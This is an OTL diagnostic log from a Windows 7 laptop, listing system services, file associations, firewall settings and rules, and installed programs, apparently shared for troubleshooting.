SRV:64bit: - [2010/11/20 22:24:17 | 000,344,064 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasmans.dll -- (RasMan)

SRV:64bit: - [2010/11/20 22:24:01 | 000,512,000 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (RpcSs)

SRV:64bit: - [2010/11/20 22:24:16 | 000,030,720 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\seclogon.dll -- (seclogon)

SRV:64bit: - [2014/04/11 21:19:05 | 000,031,232 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsass.exe -- (SamSs)

SRV:64bit: - [2009/07/13 20:41:58 | 000,097,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wscsvc.dll -- (wscsvc)

SRV:64bit: - [2010/11/20 22:23:48 | 000,236,032 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\srvsvc.dll -- (LanmanServer)

SRV:64bit: - [2010/11/20 22:23:55 | 000,370,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\shsvcs.dll -- (ShellHWDetection)

SRV - [2010/11/20 22:24:03 | 000,328,192 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\shsvcs.dll -- (ShellHWDetection)

No service found with a name of slsvc

SRV:64bit: - [2010/11/20 22:24:16 | 001,110,016 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\schedsvc.dll -- (Schedule)

SRV:64bit: - [2010/11/20 22:24:32 | 000,316,928 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\tapisrv.dll -- (TapiSrv)

SRV - [2010/11/20 22:24:00 | 000,242,176 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\tapisrv.dll -- (TapiSrv)

SRV:64bit: - [2009/07/13 20:41:55 | 000,044,544 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\themeservice.dll -- (Themes)

SRV:64bit: - [2012/05/01 00:40:20 | 000,209,920 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\profsvc.dll -- (ProfSvc)

SRV:64bit: - [2010/11/20 22:23:55 | 001,600,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\VSSVC.exe -- (VSS)

SRV:64bit: - [2010/11/20 22:24:32 | 000,679,424 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioSrv)

SRV:64bit: - [2010/11/20 22:24:32 | 000,679,424 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\audiosrv.dll -- (AudioEndpointBuilder)

SRV:64bit: - [2010/11/20 22:25:06 | 000,170,496 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\sdrsvc.dll -- (SDRSVC)

SRV:64bit: - [2013/05/27 00:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)

SRV:64bit: - [2010/11/20 22:23:55 | 001,646,080 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wevtsvc.dll -- (eventlog)

SRV:64bit: - [2010/11/20 22:24:28 | 000,828,416 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\MPSSVC.dll -- (MpsSvc)

SRV:64bit: - [2010/11/20 22:24:48 | 000,580,096 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wiaservc.dll -- (stisvc)

SRV:64bit: - [2010/11/20 22:24:15 | 000,128,000 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\windows\SysNative\msiexec.exe -- (msiserver)

SRV - [2010/11/20 22:24:28 | 000,073,216 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\windows\SysWow64\msiexec.exe -- (msiserver)

SRV:64bit: - [2009/07/13 20:41:56 | 000,242,688 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wbem\WMIsvc.dll -- (Winmgmt)

SRV:64bit: - [2014/05/14 11:23:46 | 002,477,536 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wuaueng.dll -- (wuauserv)

SRV:64bit: - [2010/11/20 22:24:09 | 000,252,416 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dot3svc.dll -- (dot3svc)

SRV:64bit: - [2009/07/13 20:41:56 | 000,886,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wlansvc.dll -- (Wlansvc)

SRV:64bit: - [2010/11/20 22:24:32 | 000,118,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wkssvc.dll -- (LanmanWorkstation)

< End of report >

[adh]

extras.txt

OTL Extras logfile created on: 10/29/2014 8:09:31 AM - Run 1

OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ADH.Heathman-PC\Desktop

64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation

Internet Explorer (Version = 9.10.9200.17116)

Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

7.91 Gb Total Physical Memory | 4.75 Gb Available Physical Memory | 60.09% Memory free

15.82 Gb Paging File | 12.42 Gb Available in Paging File | 78.55% Paging File free

Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\windows | %ProgramFiles% = C:\Program Files (x86)

Drive C: | 449.23 Gb Total Space | 295.86 Gb Free Space | 65.86% Space Free | Partition Type: NTFS

Computer Name: HEATHMAN-PC | User Name: ADH | Logged in as Administrator.

Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans

Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Extra Registry (SafeList) ==========

========== File Associations ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]

.html[@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)

.url[@ = InternetShortcut] -- C:\windows\SysNative\rundll32.exe (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]

.cpl [@ = cplfile] -- C:\windows\SysWow64\control.exe (Microsoft Corporation)

.html [@ = htmlfile] -- C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation)

========== Shell Spawning ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]

batfile [open] -- "%1" %*

cmdfile [open] -- "%1" %*

comfile [open] -- "%1" %*

exefile [open] -- "%1" %*

helpfile [open] -- Reg Error: Key error.

htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)

htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)

htmlfile [print] -- rundll32.exe %SystemRoot%\system32\mshtml.dll,PrintHTML "%1" (Microsoft Corporation)

http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)

https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)

inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)

InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)

InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)

piffile [open] -- "%1" %*

regfile [merge] -- Reg Error: Key error.

scrfile [config] -- "%1"

scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l

scrfile [open] -- "%1" /S

txtfile [edit] -- Reg Error: Key error.

Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1

Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)

Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

Folder [explore] -- Reg Error: Value error.

Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)

CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]

batfile [open] -- "%1" %*

cmdfile [open] -- "%1" %*

comfile [open] -- "%1" %*

cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)

exefile [open] -- "%1" %*

helpfile [open] -- Reg Error: Key error.

htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)

htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)

http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)

https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)

inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)

piffile [open] -- "%1" %*

regfile [merge] -- Reg Error: Key error.

scrfile [config] -- "%1"

scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l

scrfile [open] -- "%1" /S

txtfile [edit] -- Reg Error: Key error.

Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1

Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)

Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

Folder [explore] -- Reg Error: Value error.

Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)

Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)

CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- Reg Error: Value error.

========== Security Center Settings ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]

"cval" = 1

"FirewallDisableNotify" = 0

"AntiVirusDisableNotify" = 0

"UpdatesDisableNotify" = 0

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]

"VistaSp1" = 28 4D B2 76 41 04 CA 01 [binary data]

"AntiVirusOverride" = 0

"AntiSpywareOverride" = 0

"FirewallOverride" = 0

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]

========== System Restore Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]

"DisableSR" = 0

========== Firewall Settings ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]

"EnableFirewall" = 1

"DisableNotifications" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]

"EnableFirewall" = 1

"DisableNotifications" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]

"EnableFirewall" = 1

"DisableNotifications" = 0

========== Authorized Applications List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]

========== Vista Active Open Ports Exception List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]

"{0109A1D6-A139-44FA-9627-DD2221EAE360}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |

"{05EB8B0D-5F5B-4F39-92FB-25008FEC74FA}" = lport=139 | protocol=6 | dir=in | app=system |

"{06FDC3A8-FAE2-4686-A4AC-E721B246CDB9}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |

"{0E0269A8-FFDB-476E-8DE9-E07AD1242558}" = rport=2177 | protocol=17 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |

"{14C1AEDE-09F3-4486-8A01-5D9500DC0CB3}" = lport=10243 | protocol=6 | dir=in | app=system |

"{32F67FFF-6E46-49EF-A86D-09E0673E5601}" = lport=5353 | protocol=17 | dir=in | app=c:\program files (x86)\google\chrome\application\chrome.exe |

"{3382BE6E-1BCC-48D0-BA37-E4C54C30E33A}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe |

"{3BA14E21-EB20-4B5A-BE12-55A69558C189}" = lport=2177 | protocol=6 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |

"{3F8DD20C-B58E-4228-B191-288661F3A923}" = lport=6004 | protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office14\outlook.exe |

"{46554E25-9EF5-4BDA-A35C-565394AAFD53}" = lport=10255 | protocol=6 | dir=in | name=tmc_plugin_port |

"{50145AEF-8061-400C-99B0-09F89C5EF9F4}" = rport=2177 | protocol=6 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe |

"{5450716C-A89B-49DA-A7EB-39BCE09ABC90}" = lport=1900 | protocol=17 | dir=in | name=windows live communications platform (ssdp) |

"{58AC6BF6-BEC9-47EC-A296-3F449941171B}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |

"{5908E83F-A67E-4D95-B275-37A845D908C0}" = lport=2869 | protocol=6 | dir=in | name=windows live communications platform (upnp) |

"{5E56781C-F65E-457B-AB2C-134E9FE2807F}" = lport=137 | protocol=17 | dir=in | app=system |

"{651F64D6-6998-4735-BE12-5E9E29C1C94E}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe |

"{7154AFE0-4FD4-499D-A9B2-522EF2D3EE72}" = rport=445 | protocol=6 | dir=out | app=system |

"{76FDD123-1311-4F98-90C5-CB2D8EF323F3}" = rport=80 | protocol=6 | dir=out | app=c:\program files (x86)\common files\intuit\update service v4\intuitupdateservice.exe |

"{8A575D7A-C3F1-4176-86B7-548B0CC7FF82}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 |

"{93231470-066D-4246-88E6-08BDB4824C4E}" = rport=80 | protocol=6 | dir=out | app=c:\program files (x86)\common files\intuit\update service v4\intuitupdater.exe |

"{97C2C3C0-9D0E-4BE5-96FA-2FA944FE271B}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe |

"{9AF4D293-69CF-4628-8714-11B1943BA6E8}" = rport=139 | protocol=6 | dir=out | app=system |

"{9C41DD2F-C2BC-456D-8294-3220B7DC7651}" = lport=445 | protocol=6 | dir=in | app=system |

"{A2E1B399-4404-4C80-82D7-AF0E43822FA0}" = rport=80 | protocol=6 | dir=out | app=c:\program files (x86)\common files\intuit\update service\intuitupdateservice.exe |

"{B3E2C739-16D9-4610-8627-98D7993195A3}" = lport=138 | protocol=17 | dir=in | app=system |

"{CE54D053-8A07-41BD-BAE7-933AB74FA0AF}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe |

"{D048C981-08FC-4E8B-856D-004A193E4E25}" = lport=2177 | protocol=17 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe |

"{D358AB8B-951D-4E9B-B17B-FA2ED63E0EAD}" = rport=138 | protocol=17 | dir=out | app=system |

"{DDBB8F75-C211-4435-BF17-3D71F84FFA30}" = rport=10243 | protocol=6 | dir=out | app=system |

"{E3CB2CF7-2603-4C2E-B5FD-6C1BEDAE8E91}" = rport=137 | protocol=17 | dir=out | app=system |

"{F21A9E64-5E87-41D9-B47F-01A2F2C1A608}" = lport=2869 | protocol=6 | dir=in | app=system |

"{F3E99991-E77C-406F-AF6E-F29BE340E0BE}" = rport=80 | protocol=6 | dir=out | app=c:\program files (x86)\common files\intuit\update service\intuitupdater.exe |

========== Vista Active Application Exception List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]

"{0A522226-8256-4C37-93C0-FEC1B4842296}" = protocol=17 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |

"{0E4FF8F8-AEA0-4714-80C8-9AC1136C5C0F}" = dir=out | app=c:\program files (x86)\motorola mobility\motocast\bin\motocast-thumbnailer.exe |

"{14F238E0-5D87-457F-9A4F-08BF95E2FCFC}" = dir=in | app=c:\program files (x86)\windows live\messenger\msnmsgr.exe |

"{1853D9A6-6DFB-43CC-8DE3-C75043064EA3}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 |

"{1CF5F9E5-ED65-4545-BFD2-B2ABA62AEF72}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office14\onenote.exe |

"{1D49305B-2D19-4E31-80EF-B572589E6BCD}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |

"{29167C02-9405-47EB-819A-BE7508043743}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |

"{292894D7-4F8E-4D72-A134-CBA957D06A22}" = protocol=6 | dir=out | app=system |

"{2AA03B56-07BB-4F21-B511-A36F1D92B386}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 |

"{2F6B9536-141A-4D82-B12A-CAA2E93220B7}" = dir=in | app=c:\program files (x86)\motorola mobility\motocast\motocast.exe |

"{3516CBCA-DF10-4256-B901-52C4906A15DF}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |

"{3A8AFAE8-A854-4729-AADC-E9C5CD73D10E}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |

"{3E7A1A0A-2B0A-4A75-96AC-76DDBECB09CC}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |

"{4467AA00-CFC2-415C-8094-9497FCD16BEE}" = protocol=6 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |

"{4B9D8158-0852-4A64-AEEC-B85E55BFD4EF}" = dir=in | app=c:\program files\intel\wifi\bin\pandhcpdns.exe |

"{4DACCDF8-7633-4072-BA1E-B69021568E65}" = protocol=58 | dir=in | name=@firewallapi.dll,-28545 |

"{53C30A38-375B-4EAC-A4FC-7255FEE57685}" = dir=in | app=c:\program files (x86)\windows live\mesh\moe.exe |

"{5440342B-932A-45EF-A606-73C0439AEF16}" = dir=in | app=c:\program files (x86)\intel corporation\intel widi\widiapp.exe |

"{5D8D9F4A-DC57-4968-A5A8-FCA0010BD9E7}" = dir=in | app=c:\program files (x86)\itunes\itunes.exe |

"{6B489BFB-2B3D-43E4-9C30-5CC0328051BD}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |

"{76B61BB7-45BF-4C15-9F10-4E591FC9B5F4}" = dir=in | app=c:\program files (x86)\motorola mobility\motocast\bin\motocast-thumbnailer.exe |

"{7A1E7E5B-0CA3-463C-9268-D5E31821772C}" = protocol=6 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |

"{7A2BA6C0-2376-4A9F-89FA-B6492AAD2397}" = protocol=17 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe |

"{837266CD-A281-430A-888A-BCB1007BC250}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 |

"{8A4838BE-54E4-44F4-B066-9AC7B34D687A}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |

"{95694C8E-3035-410D-8CA0-CCAFF1942A76}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe |

"{A333A514-2A16-4C9E-9E6D-A0F46559A2D4}" = protocol=17 | dir=in | app=%programfiles(x86)%\windows media player\wmplayer.exe |

"{A660A08F-92AE-4906-AA40-BC8CB7C74693}" = protocol=6 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe |

"{AC0D235D-8EA7-4EA9-A8BE-9CA2F3DE298E}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |

"{ACBDAE9B-7F03-4C3B-8963-2DC492FAA047}" = dir=out | app=c:\program files (x86)\motorola mobility\motocast\motocast.exe |

"{C872428A-EEC0-4859-981B-44A990B4821D}" = dir=in | app=c:\program files (x86)\windows live\contacts\wlcomm.exe |

"{CD04F4DD-A7DF-4310-A92C-25336277B19F}" = dir=in | app=c:\program files (x86)\laplink\pcmover\pcmover.exe |

"{D852537B-5FFA-44C3-8F0E-D8D771158A50}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |

"{E896EF2C-18C5-4071-B770-44465D78ED2F}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft office\office14\onenote.exe |

"{EBEB8A1A-488D-4789-BBAD-32F0C3F72577}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |

"{ECDB25FF-0B32-4A84-84F2-88BF932FBDAF}" = dir=in | app=c:\program files (x86)\motorola media link\lite\mml.exe |

"{F0532A61-8055-498F-9B30-51ED5A015797}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe |

========== HKEY_LOCAL_MACHINE Uninstall List ==========

64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]

"{066CFFF8-12BF-4390-A673-75F95EFF188E}" = TOSHIBA Value Added Package

"{071c9b48-7c32-4621-a0ac-3f809523288f}" = Microsoft Visual C++ 2005 Redistributable (x64)

"{180C8888-50F1-426B-A9DC-AB83A1989C65}" = Windows Live Language Selector

"{1ACC8FFB-9D84-4C05-A4DE-D28A9BC91698}" = Windows Live ID Sign-in Assistant

"{1C8C049A-145F-4A6E-8290-B5C245EBE39D}" = TOSHIBA Bulletin Board

"{24811C12-F4A9-4D0F-8494-A7B8FE46123C}" = TOSHIBA ReelTime

"{27C3DB42-A9C1-4B44-A164-93849D160D12}" = TOSHIBA Blu-ray Disc Player

"{28EF7372-9087-4AC3-9B9F-D9751FCDF830}" = Intel® Wireless Display

"{350AA351-21FA-3270-8B7A-835434E766AD}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022

"{3C41721F-AF0F-4086-AA1C-4C7F29076228}" = Intel® PROSet/Wireless WiFi Software

"{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148

"{5DA0E02F-970B-424B-BF41-513A5018E4C0}" = TOSHIBA Disc Creator

"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161

"{656DEEDE-F6AC-47CA-A568-A1B4E34B5760}" = Windows Live Remote Service Resources

"{6AF2AC2A-3532-43FD-9F4D-BDC9C0D724C7}" = Apple Mobile Device Support

"{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}" = Bonjour

"{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}" = Microsoft Visual C++ 2005 Redistributable (x64)

"{759E6A2F-1F01-45EF-A0C4-22F1B56CB975}" = Motorola Mobile Drivers Installation 6.3.0

"{77DE5105-D05E-448C-96CB-7FA381903753}" = iTunes

"{7DEBE4EB-6B40-3766-BB35-5CBBC385DA37}" = Microsoft .NET Framework 4.5.1

"{8220EEFE-38CD-377E-8595-13398D740ACE}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17

"{847B0532-55E3-4AAF-8D7B-E3A1A7CD17E5}" = Windows Live Remote Client Resources

"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight

"{90140000-002A-0000-1000-0000000FF1CE}" = Microsoft Office Office 64-bit Components 2010

"{90140000-002A-0409-1000-0000000FF1CE}" = Microsoft Office Shared 64-bit MUI (English) 2010

"{90140000-0116-0409-1000-0000000FF1CE}" = Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010

"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5.1

"{94A90C69-71C1-470A-88F5-AA47ECC96B40}" = TOSHIBA HDD Protection

"{95120000-00B9-0409-1000-0000000FF1CE}" = Microsoft Application Error Reporting

"{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}" = TOSHIBA PC Health Monitor

"{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}" = Microsoft Visual C++ 2005 Redistributable (x64)

"{B2FE1952-0186-46c3-BAEC-A80AA35AC5B8}_Display.ControlPanel" = NVIDIA Control Panel 296.10

"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver" = NVIDIA Graphics Driver 296.10

"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB" = NVIDIA 3D Vision Controller Driver 296.10

"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Optimus" = NVIDIA Optimus 1.7.11

"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX" = NVIDIA PhysX System Software 9.12.0213

"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_installer" = NVIDIA Install Application

"{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NVIDIA.Update" = NVIDIA Update Components

"{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}" = PlayReady PC Runtime amd64

"{C2F94B5E-201A-4754-8F2F-4395E1D90DA3}" = TOSHIBA eco Utility

"{D4322448-B6AF-4316-B859-D8A0E84DCB38}" = TOSHIBA HDD/SSD Alert

"{DA54F80E-261C-41A2-A855-549A144F2F59}" = Windows Live MIME IFilter

"{DF6D988A-EEA0-4277-AAB8-158E086E439B}" = Windows Live Remote Client

"{E02A6548-6FDE-40E2-8ED9-119D7D7E641F}" = Windows Live Remote Service

"{E2C24FE1-C6BB-4A4B-8B7F-BF2521DEB91E}" = Share64

"{F67FA545-D8E5-4209-86B1-AEE045D1003F}" = TOSHIBA Face Recognition

"ProInst" = Intel PROSet Wireless

"SynTPDeinstKey" = Synaptics Pointing Device Driver

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]

"_{E185BD5C-0E10-479F-AF44-63D3A068446A}" = Corel Digital Studio SE

"{05BDC796-3451-4F81-B91D-E98F7ADA76C2}" = TurboTax 2010 WinPerTaxSupport

"{066CFFF8-12BF-4390-A673-75F95EFF188E}" = TOSHIBA Value Added Package

"{0A7DD94B-B746-4FB0-8688-8598C22793A0}" = TurboTax 2013 WinPerFedFormset

"{0B0F231F-CE6A-483D-AA23-77B364F75917}" = Windows Live Installer

"{0D557AE9-1484-4E22-978F-A372EE04F16F}" = TurboTax 2010 wmoiper

"{0D795777-9D60-4692-8386-F2B3F2B5E5BF}" = Label@Once 1.0

"{12688FD7-CB92-4A5B-BEE4-5C8E0574434F}" = Utility Common Driver

"{18455581-E099-4BA8-BC6B-F34B2F06600C}" = Google Toolbar for Internet Explorer

"{196467F1-C11F-4F76-858B-5812ADC83B94}" = MSXML 4.0 SP3 Parser

"{196BB40D-1578-3D01-B289-BEFC77A11A1E}" = Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319

"{19BA08F7-C728-469C-8A35-BFBD3633BE08}" = Windows Live Movie Maker

"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148

"{1F6AB0E7-8CDD-4B93-8A23-AA9EB2FEFCE4}" = Junk Mail filter update

"{200FEC62-3C34-4D60-9CE8-EC372E01C08F}" = Windows Live SOXE Definitions

"{2318C2B1-4965-11d4-9B18-009027A5CD4F}" = Google Toolbar for Internet Explorer

"{246BBF3E-3CB6-4269-9728-904C54CC1D4A}" = Jewel Quest Mysteries Curse of the Emerald Tear

"{26604C7E-A313-4D12-867F-7C6E7820BE4C}" = JMicron Flash Media Controller Driver

